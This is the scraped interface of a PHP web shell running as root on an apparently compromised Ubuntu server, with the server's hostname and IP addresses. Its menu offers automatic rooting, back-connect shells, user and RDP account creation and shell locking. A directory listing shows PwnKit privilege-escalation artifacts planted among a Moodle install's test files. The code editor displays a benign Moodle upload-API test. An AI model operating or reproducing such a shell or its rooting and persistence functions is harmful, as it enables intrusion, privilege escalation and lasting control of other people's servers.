Linux vmi284606.contaboserver.net 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64
Apache/2.4.57 (Ubuntu)
: 167.86.127.34 | : 216.73.217.51
Cant Read [ /etc/named.conf ]
7.2.24-0ubuntu0.18.04.17
root
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
insepet /
libromaster /
files /
tests /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
externallib_test.php
4.37
KB
-rwxrwxrwx
pwnkit
10.99
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : externallib_test.php
<?php // This file is part of Moodle - http://moodle.org/ // // Moodle is free software: you can redistribute it and/or modify // it under the terms of the GNU General Public License as published by // the Free Software Foundation, either version 3 of the License, or // (at your option) any later version. // // Moodle is distributed in the hope that it will be useful, // but WITHOUT ANY WARRANTY; without even the implied warranty of // MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the // GNU General Public License for more details. // // You should have received a copy of the GNU General Public License // along with Moodle. If not, see <http://www.gnu.org/licenses/>. /** * PHPunit tests for external files API. * * @package core_files * @category external * @copyright 2013 Ankit Agarwal * @license http://www.gnu.org/copyleft/gpl.html GNU GPL v3 or later * @since Moodle 2.6 */ defined('MOODLE_INTERNAL') || die(); global $CFG; require_once($CFG->dirroot . '/webservice/tests/helpers.php'); require_once($CFG->dirroot . '/files/externallib.php'); class test_external_files extends advanced_testcase { /* * Test core_files_external::upload(). */ public function test_upload() { global $USER; $this->resetAfterTest(); $this->setAdminUser(); $context = context_user::instance($USER->id); $contextid = $context->id; $component = "user"; $filearea = "private"; $itemid = 0; $filepath = "/"; $filename = "Simple.txt"; $filecontent = base64_encode("Let us create a nice simple file"); $browser = get_file_browser(); // Make sure no file exists. $file = $browser->get_file_info($context, $component, $filearea, $itemid, $filepath, $filename); $this->assertEmpty($file); // Call the api to create a file. core_files_external::upload($contextid, $component, $filearea, $itemid, $filepath, $filename, $filecontent); // Make sure the file was created. $file = $browser->get_file_info($context, $component, $filearea, $itemid, $filepath, $filename); $this->assertNotEmpty($file); // Make sure no file exists. $itemid = 2; $filename = "Simple2.txt"; $file = $browser->get_file_info($context, $component, $filearea, $itemid, $filepath, $filename); $this->assertEmpty($file); // Call the api to create a file. $fileinfo = core_files_external::upload($contextid, $component, $filearea, $itemid, $filepath, $filename, $filecontent); // Make sure itemid is always set to 0. $this->assertEquals(0, $fileinfo['itemid']); // Make sure the same file cannot be created again. $this->setExpectedException("moodle_exception"); core_files_external::upload($contextid, $component, $filearea, $itemid, $filepath, $filename, $filecontent); } /* * Make sure only user component is allowed in core_files_external::upload(). */ public function test_upload_param_component() { global $USER; $this->resetAfterTest(); $this->setAdminUser(); $context = context_user::instance($USER->id); $contextid = $context->id; $component = "backup"; $filearea = "private"; $itemid = 0; $filepath = "/"; $filename = "Simple3.txt"; $filecontent = base64_encode("Let us create a nice simple file"); // Make sure exception is thrown. $this->setExpectedException("coding_exception"); core_files_external::upload($contextid, $component, $filearea, $itemid, $filepath, $filename, $filecontent); } /* * Make sure only private area is allowed in core_files_external::upload(). */ public function test_upload_param_area() { global $USER; $this->resetAfterTest(); $this->setAdminUser(); $context = context_user::instance($USER->id); $contextid = $context->id; $component = "user"; $filearea = "draft"; $itemid = 0; $filepath = "/"; $filename = "Simple4.txt"; $filecontent = base64_encode("Let us create a nice simple file"); // Make sure exception is thrown. $this->setExpectedException("coding_exception"); core_files_external::upload($contextid, $component, $filearea, $itemid, $filepath, $filename, $filecontent); } }
Close